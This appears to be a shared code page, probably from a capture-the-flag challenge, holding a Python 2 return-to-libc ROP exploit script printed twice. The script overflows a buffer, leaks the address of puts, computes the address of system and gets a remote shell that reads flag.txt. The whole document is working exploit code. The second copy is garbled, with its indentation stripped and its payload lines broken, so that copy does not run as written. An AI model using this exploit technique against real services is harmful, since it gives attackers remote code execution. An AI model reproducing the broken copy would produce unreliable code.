plasticuproject · June 23, 2019 18:00
diff --git a/myrop.py b/myrop.py
 #!/usr/bin/env python2
 # Return to LIB_C with ROP to PUTS

 import telnetlib
 import socket
 import struct

 host = "host"
 port = "port"

 # set up connection
 s = socket.create_connection((host, port))
 f = s.makefile('rw', bufsize = 0)
 def communicate(s):
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()

 # get end of program output
 def read_end(f, delimit):
    strng = ''
    while not strng.endswith(delimit):
        strng += f.read(1)
    return strng

 # payload to leak PUTS, returns to MAIN
 def leak():
    payload  = "\x41"*(0x40 + 8)            # buffer = A * 72
    payload += struct.pack("<q", 0x4006d3)  # POP RDI; RET
    payload += struct.pack("<q", 0x601018)  # PUTS@GOT
    payload += struct.pack("<q", 0x4004e0)  # PUTS@PLT
    payload += struct.pack("<q", 0x400626)  # to MAIN
    return payload

 # use payload to leak LIBC_PUTS location
 read_end(f, chr(0x0a))      # read until newline
 f.write(leak() + chr(0x0a)) # send payload and newline

 # get LIBC_PUTS and create offsets
 libc_puts = struct.unpack("<q", f.read(6).ljust(8, "\x00"))[0] # format address
 libc_base = libc_puts - 0x6f690
 libc_system = libc_base + 0x45390
 shell = libc_base + 0x18cd57
 
 # print locations
 print "LIBC_PUTS: {}".format(hex(libc_puts))
 print "LIBC_BASE: {}".format(hex(libc_base))
 print "LIBC_SYSTEM: {}".format(hex(libc_system))
 print "SHELL: {}".format(hex(shell))

 # shell exploit
 def exploit():
    payload  = "\x41"*(0x40 + 8)                     # buffer = A * 72
    payload += struct.pack("<q", 0x4006d3)           # POP RDI; RET
    payload += struct.pack("<q", 0x000000000040038f) # LIBC_PUTS
    payload += struct.pack("<q", libc_system)        # SYSTEM
    return payload

 # send shell exploit with newline
 f.write(exploit() + chr(0x0a))

 # print flag
 f.write("cat flag.txt" + chr(0x0a))

 # interact with shell and terminate
 try:
    communicate(s)
 except KeyboardInterrupt:
    print "\n"
    quit()
	#!/usr/bin/env python2
	# Return to LIB_C with ROP to PUTS

	import telnetlib
	import socket
	import struct

	host = "host"
	port = "port"

	# set up connection
	s = socket.create_connection((host, port))
	f = s.makefile('rw', bufsize = 0)
	def communicate(s):
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

	# get end of program output
	def read_end(f, delimit):
	strng = ''
	while not strng.endswith(delimit):
	strng += f.read(1)
	return strng

	# payload to leak PUTS, returns to MAIN
	def leak():
	payload = "\x41"(0x40 + 8) # buffer = A 72
	payload += struct.pack("<q", 0x4006d3) # POP RDI; RET
	payload += struct.pack("<q", 0x601018) # PUTS@GOT
	payload += struct.pack("<q", 0x4004e0) # PUTS@PLT
	payload += struct.pack("<q", 0x400626) # to MAIN
	return payload

	# use payload to leak LIBC_PUTS location
	read_end(f, chr(0x0a)) # read until newline
	f.write(leak() + chr(0x0a)) # send payload and newline

	# get LIBC_PUTS and create offsets
	libc_puts = struct.unpack("<q", f.read(6).ljust(8, "\x00"))[0] # format address
	libc_base = libc_puts - 0x6f690
	libc_system = libc_base + 0x45390
	shell = libc_base + 0x18cd57

	# print locations
	print "LIBC_PUTS: {}".format(hex(libc_puts))
	print "LIBC_BASE: {}".format(hex(libc_base))
	print "LIBC_SYSTEM: {}".format(hex(libc_system))
	print "SHELL: {}".format(hex(shell))

	# shell exploit
	def exploit():
	payload = "\x41"(0x40 + 8) # buffer = A 72
	payload += struct.pack("<q", 0x4006d3) # POP RDI; RET
	payload += struct.pack("<q", 0x000000000040038f) # LIBC_PUTS
	payload += struct.pack("<q", libc_system) # SYSTEM
	return payload

	# send shell exploit with newline
	f.write(exploit() + chr(0x0a))

	# print flag
	f.write("cat flag.txt" + chr(0x0a))

	# interact with shell and terminate
	try:
	communicate(s)
	except KeyboardInterrupt:
	print "\n"
	quit()
No results found